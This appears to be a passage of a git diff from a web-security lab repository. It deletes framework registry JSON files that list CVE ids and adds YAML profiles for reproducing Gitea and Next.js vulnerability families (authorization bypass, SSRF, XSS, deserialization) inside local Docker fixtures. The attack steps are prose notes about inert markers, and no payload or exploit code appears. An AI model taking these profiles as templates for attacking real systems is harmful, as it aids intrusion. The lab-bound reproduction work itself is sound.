-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/redmine.json b/08-threat-intel/registry/systems/redmine.json
deleted file mode 100644
index f3568798..00000000
--- a/08-threat-intel/registry/systems/redmine.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "redmine",
-  "display_name": "Redmine",
-  "category": "platforms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/platforms/redmine",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "xss-output-encoding",
-    "plugin-extension-trust-policy"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/saleor.json b/08-threat-intel/registry/systems/saleor.json
deleted file mode 100644
index 98fdf551..00000000
--- a/08-threat-intel/registry/systems/saleor.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "saleor",
-  "display_name": "Saleor",
-  "category": "ecommerce",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/ecommerce/saleor",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/shopware.json b/08-threat-intel/registry/systems/shopware.json
deleted file mode 100644
index edde7eae..00000000
--- a/08-threat-intel/registry/systems/shopware.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "shopware",
-  "display_name": "Shopware",
-  "category": "ecommerce",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/ecommerce/shopware",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "plugin-extension-trust-policy",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/spring-boot.json b/08-threat-intel/registry/systems/spring-boot.json
deleted file mode 100644
index b3645400..00000000
--- a/08-threat-intel/registry/systems/spring-boot.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "spring-boot",
-  "display_name": "Spring Boot",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/spring-boot",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "authz-server-side-recheck"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/spring-framework.json b/08-threat-intel/registry/systems/spring-framework.json
deleted file mode 100644
index 9636f0b8..00000000
--- a/08-threat-intel/registry/systems/spring-framework.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "spring-framework",
-  "display_name": "Spring Framework",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/spring-framework",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "path-traversal-guard",
-    "deserialization-safety"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/spring-security.json b/08-threat-intel/registry/systems/spring-security.json
deleted file mode 100644
index d53c14d0..00000000
--- a/08-threat-intel/registry/systems/spring-security.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "spring-security",
-  "display_name": "Spring Security",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/spring-security",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "proxy-trust-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/strapi.json b/08-threat-intel/registry/systems/strapi.json
deleted file mode 100644
index 9f44c350..00000000
--- a/08-threat-intel/registry/systems/strapi.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "strapi",
-  "display_name": "Strapi",
-  "category": "cms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/cms/strapi",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/sveltekit.json b/08-threat-intel/registry/systems/sveltekit.json
deleted file mode 100644
index 07c93bff..00000000
--- a/08-threat-intel/registry/systems/sveltekit.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "sveltekit",
-  "display_name": "SvelteKit",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/sveltekit",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/symfony.json b/08-threat-intel/registry/systems/symfony.json
deleted file mode 100644
index d0a08602..00000000
--- a/08-threat-intel/registry/systems/symfony.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "symfony",
-  "display_name": "Symfony",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/symfony",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "authz-server-side-recheck",
-    "path-traversal-guard"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/traefik.json b/08-threat-intel/registry/systems/traefik.json
deleted file mode 100644
index fcd440de..00000000
--- a/08-threat-intel/registry/systems/traefik.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "traefik",
-  "display_name": "Traefik",
-  "category": "servers",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/servers/traefik",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "request-smuggling-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/undici.json b/08-threat-intel/registry/systems/undici.json
deleted file mode 100644
index 76cf4729..00000000
--- a/08-threat-intel/registry/systems/undici.json
+++ /dev/null
@@ -1,35 +0,0 @@
-{
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 14,
-  "markdown_cases": 14,
-  "triage_count": 0,
-  "latest_update": "2026-03-14T09:19:54.772219Z",
-  "output_dir": "07-framework-security/frameworks/undici",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 14,
-  "items": [
-    "undici--CVE-2026-1526",
-    "undici--CVE-2026-2229",
-    "undici--CVE-2026-1527",
-    "undici--CVE-2026-2581",
-    "undici--CVE-2026-1528",
-    "undici--CVE-2026-1525",
-    "undici--CVE-2026-22036",
-    "undici--CVE-2025-47279",
-    "undici--CVE-2025-22150",
-    "undici--CVE-2024-30261",
-    "undici--CVE-2024-30260",
-    "undici--CVE-2023-45143",
-    "undici--CVE-2022-31151",
-    "undici--CVE-2022-32210"
-  ]
-}
diff --git a/08-threat-intel/registry/systems/vite.json b/08-threat-intel/registry/systems/vite.json
deleted file mode 100644
index a252d304..00000000
--- a/08-threat-intel/registry/systems/vite.json
+++ /dev/null
@@ -1,34 +0,0 @@
-{
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "tier": "history-full",
-  "total": 12,
-  "markdown_cases": 12,
-  "triage_count": 0,
-  "latest_update": "2026-02-04T04:37:24.129476Z",
-  "output_dir": "07-framework-security/frameworks/vite",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 12,
-  "items": [
-    "vite--CVE-2025-62522",
-    "vite--CVE-2025-58751",
-    "vite--CVE-2025-58752",
-    "vite--CVE-2025-46565",
-    "vite--CVE-2025-32395",
-    "vite--CVE-2025-31486",
-    "vite--CVE-2025-31125",
-    "vite--CVE-2025-30208",
-    "vite--CVE-2025-24010",
-    "vite--CVE-2024-45812",
-    "vite--CVE-2024-45811",
-    "vite--CVE-2024-23331"
-  ]
-}
diff --git a/08-threat-intel/registry/systems/vue.json b/08-threat-intel/registry/systems/vue.json
deleted file mode 100644
index e1910350..00000000
--- a/08-threat-intel/registry/systems/vue.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "vue",
-  "display_name": "Vue",
-  "category": "frameworks",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/vue",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "template-injection-guard",
-    "csp-trusted-types"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/webpack.json b/08-threat-intel/registry/systems/webpack.json
deleted file mode 100644
index 4d8dc320..00000000
--- a/08-threat-intel/registry/systems/webpack.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "webpack",
-  "display_name": "webpack",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/webpack",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/werkzeug.json b/08-threat-intel/registry/systems/werkzeug.json
deleted file mode 100644
index 71c75e2e..00000000
--- a/08-threat-intel/registry/systems/werkzeug.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "werkzeug",
-  "display_name": "Werkzeug",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/werkzeug",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "request-smuggling-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/woocommerce.json b/08-threat-intel/registry/systems/woocommerce.json
deleted file mode 100644
index 81fec966..00000000
--- a/08-threat-intel/registry/systems/woocommerce.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "woocommerce",
-  "display_name": "WooCommerce",
-  "category": "ecommerce",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/ecommerce/woocommerce",
-  "secure_code_topics": [
-    "plugin-extension-trust-policy",
-    "xss-output-encoding",
-    "authz-server-side-recheck"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/wordpress.json b/08-threat-intel/registry/systems/wordpress.json
deleted file mode 100644
index 3fd7f1cd..00000000
--- a/08-threat-intel/registry/systems/wordpress.json
+++ /dev/null
@@ -1,22 +0,0 @@
-{
-  "system_id": "wordpress",
-  "display_name": "WordPress",
-  "category": "cms",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/cms/wordpress",
-  "secure_code_topics": [
-    "plugin-extension-trust-policy",
-    "xss-output-encoding",
-    "file-upload-validation",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/repro-profiles/system-family/gitea-authz-bypass.yaml b/08-threat-intel/repro-profiles/system-family/gitea-authz-bypass.yaml
new file mode 100644
index 00000000..611bdf35
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/gitea-authz-bypass.yaml
@@ -0,0 +1,62 @@
+profile_id: gitea-authz-bypass
+system_id: gitea
+match_rules:
+  keywords:
+    - authorization bypass
+    - access control
+vuln_family: authz-bypass
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: gitea.authz-bypass
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/gitea/authz-bypass
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed low-privilege and admin boundary fixture state.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner verifies guest-to-admin bypass only inside fixture route.
+browser_assertions:
+  required: false
+success_criteria:
+  - Controlled guest request reaches the protected admin route inside the fixture.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+services:
+  app:
+    image: python:3.12-alpine
+    working_dir: /workspace
+    command:
+      - python
+      - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/authz-bypass/scenario.json
+      PORT: "3000"
+    ports:
+      - 18103:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18103/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/gitea-file-upload.yaml b/08-threat-intel/repro-profiles/system-family/gitea-file-upload.yaml
new file mode 100644
index 00000000..e8e93f04
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/gitea-file-upload.yaml
@@ -0,0 +1,64 @@
+profile_id: gitea-file-upload
+system_id: gitea
+match_rules:
+  keywords:
+    - file upload
+    - attachment
+vuln_family: file-upload
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: gitea.file-upload
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/gitea/file-upload
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed empty attachment list for upload proof.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner uploads inert text marker only.
+browser_assertions:
+  required: true
+success_criteria:
+  - Inert upload marker is accepted and listed on the proof page.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+  - name: browser-present
+    type: browser-present
+services:
+  app:
+    image: python:3.12-alpine
+    working_dir: /workspace
+    command:
+      - python
+      - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/file-upload/scenario.json
+      PORT: "3000"
+    ports:
+      - 18104:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18104/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/gitea-proxy-boundary.yaml b/08-threat-intel/repro-profiles/system-family/gitea-proxy-boundary.yaml
new file mode 100644
index 00000000..ac923154
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/gitea-proxy-boundary.yaml
@@ -0,0 +1,64 @@
+profile_id: gitea-proxy-boundary
+system_id: gitea
+match_rules:
+  keywords:
+    - proxy
+    - header trust
+vuln_family: proxy-boundary
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: gitea.proxy-boundary
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/gitea/proxy-boundary
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed forwarded-header boundary fixture with clean state.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner performs local forwarded-header trust proof only inside the fixture.
+browser_assertions:
+  required: true
+success_criteria:
+  - Local fixture proves trusted proxy headers cross the admin boundary.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+  - name: browser-present
+    type: browser-present
+services:
+  app:
+    image: python:3.12-alpine
+    working_dir: /workspace
+    command:
+      - python
+      - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/proxy-boundary/scenario.json
+      PORT: "3000"
+    ports:
+      - 18101:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18101/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/gitea-ssrf.yaml b/08-threat-intel/repro-profiles/system-family/gitea-ssrf.yaml
new file mode 100644
index 00000000..c8d582ff
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/gitea-ssrf.yaml
@@ -0,0 +1,62 @@
+profile_id: gitea-ssrf
+system_id: gitea
+match_rules:
+  keywords:
+    - ssrf
+    - request forgery
+vuln_family: ssrf
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: gitea.ssrf
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/gitea/ssrf
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed local sink counters only.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner triggers callback strictly to local sink endpoint.
+browser_assertions:
+  required: false
+success_criteria:
+  - Server-side callback reaches the local sink and is recorded in proof output.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+services:
+  app:
+    image: python:3.12-alpine
+    working_dir: /workspace
+    command:
+      - python
+      - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/ssrf/scenario.json
+      PORT: "3000"
+    ports:
+      - 18105:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18105/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/gitea-xss.yaml b/08-threat-intel/repro-profiles/system-family/gitea-xss.yaml
new file mode 100644
index 00000000..8686a191
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/gitea-xss.yaml
@@ -0,0 +1,64 @@
+profile_id: gitea-xss
+system_id: gitea
+match_rules:
+  keywords:
+    - xss
+    - scripting
+vuln_family: xss
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: gitea.xss
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/gitea/xss
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed stored content page before browser proof capture.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner stores inert script payload and captures proof page.
+browser_assertions:
+  required: true
+success_criteria:
+  - Browser proof page renders the stored XSS marker after the controlled payload.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+  - name: browser-present
+    type: browser-present
+services:
+  app:
+    image: python:3.12-alpine
+    working_dir: /workspace
+    command:
+      - python
+      - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/xss/scenario.json
+      PORT: "3000"
+    ports:
+      - 18102:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18102/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/nextjs-authz-bypass.yaml b/08-threat-intel/repro-profiles/system-family/nextjs-authz-bypass.yaml
new file mode 100644
index 00000000..90c047a4
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/nextjs-authz-bypass.yaml
@@ -0,0 +1,62 @@
+profile_id: nextjs-authz-bypass
+system_id: nextjs
+match_rules:
+  keywords:
+    - authorization bypass
+    - access control
+vuln_family: authz-bypass
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: nextjs.authz-bypass
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/nextjs/authz-bypass
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed guest/admin route fixture for server-side recheck.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner performs local authz bypass proof only.
+browser_assertions:
+  required: false
+success_criteria:
+  - Protected route is reachable only after the controlled bypass proof step.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+services:
+  app:
+    image: node:22-alpine
+    working_dir: /workspace
+    command:
+      - node
+      - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/nextjs/authz-bypass/scenario.json
+      PORT: "3000"
+    ports:
+      - 18202:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18202/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/nextjs-deserialization.yaml b/08-threat-intel/repro-profiles/system-family/nextjs-deserialization.yaml
new file mode 100644
index 00000000..ce1fa012
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/nextjs-deserialization.yaml
@@ -0,0 +1,62 @@
+profile_id: nextjs-deserialization
+system_id: nextjs
+match_rules:
+  keywords:
+    - deserialization
+    - serialization
+vuln_family: deserialization
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: nextjs.deserialization
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/nextjs/deserialization
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed inert decode path before proof request.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner demonstrates unsafe decode path without gadget execution.
+browser_assertions:
+  required: false
+success_criteria:
+  - Inert decoded object marker is present without executing a gadget chain.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+services:
+  app:
+    image: node:22-alpine
+    working_dir: /workspace
+    command:
+      - node
+      - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/nextjs/deserialization/scenario.json
+      PORT: "3000"
+    ports:
+      - 18205:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18205/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/nextjs-proxy-boundary.yaml b/08-threat-intel/repro-profiles/system-family/nextjs-proxy-boundary.yaml
new file mode 100644
index 00000000..4a176be8
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/nextjs-proxy-boundary.yaml
@@ -0,0 +1,64 @@
+profile_id: nextjs-proxy-boundary
+system_id: nextjs
+match_rules:
+  keywords:
+    - proxy
+    - middleware
+vuln_family: proxy-boundary
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: nextjs.proxy-boundary
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/nextjs/proxy-boundary
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed middleware boundary fixture with clean proxy state.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner performs forwarded-header proof against local fixture only.
+browser_assertions:
+  required: true
+success_criteria:
+  - Middleware trust-boundary proof is visible on the browser proof page.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+  - name: browser-present
+    type: browser-present
+services:
+  app:
+    image: node:22-alpine
+    working_dir: /workspace
+    command:
+      - node
+      - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/nextjs/proxy-boundary/scenario.json
+      PORT: "3000"
+    ports:
+      - 18201:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18201/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/nextjs-ssrf.yaml b/08-threat-intel/repro-profiles/system-family/nextjs-ssrf.yaml
new file mode 100644
index 00000000..02cba6d7
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/nextjs-ssrf.yaml
@@ -0,0 +1,62 @@
+profile_id: nextjs-ssrf
+system_id: nextjs
+match_rules:
+  keywords:
+    - ssrf
+    - request forgery
+vuln_family: ssrf
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: nextjs.ssrf
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/nextjs/ssrf
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed local callback fixture state.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner validates sink callback without leaving local network.
+browser_assertions:
+  required: false
+success_criteria:
+  - Local sink callback is observed from the server-side fetch path.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+services:
+  app:
+    image: node:22-alpine
+    working_dir: /workspace
+    command:
+      - node
+      - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/nextjs/ssrf/scenario.json
+      PORT: "3000"
+    ports:
+      - 18203:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
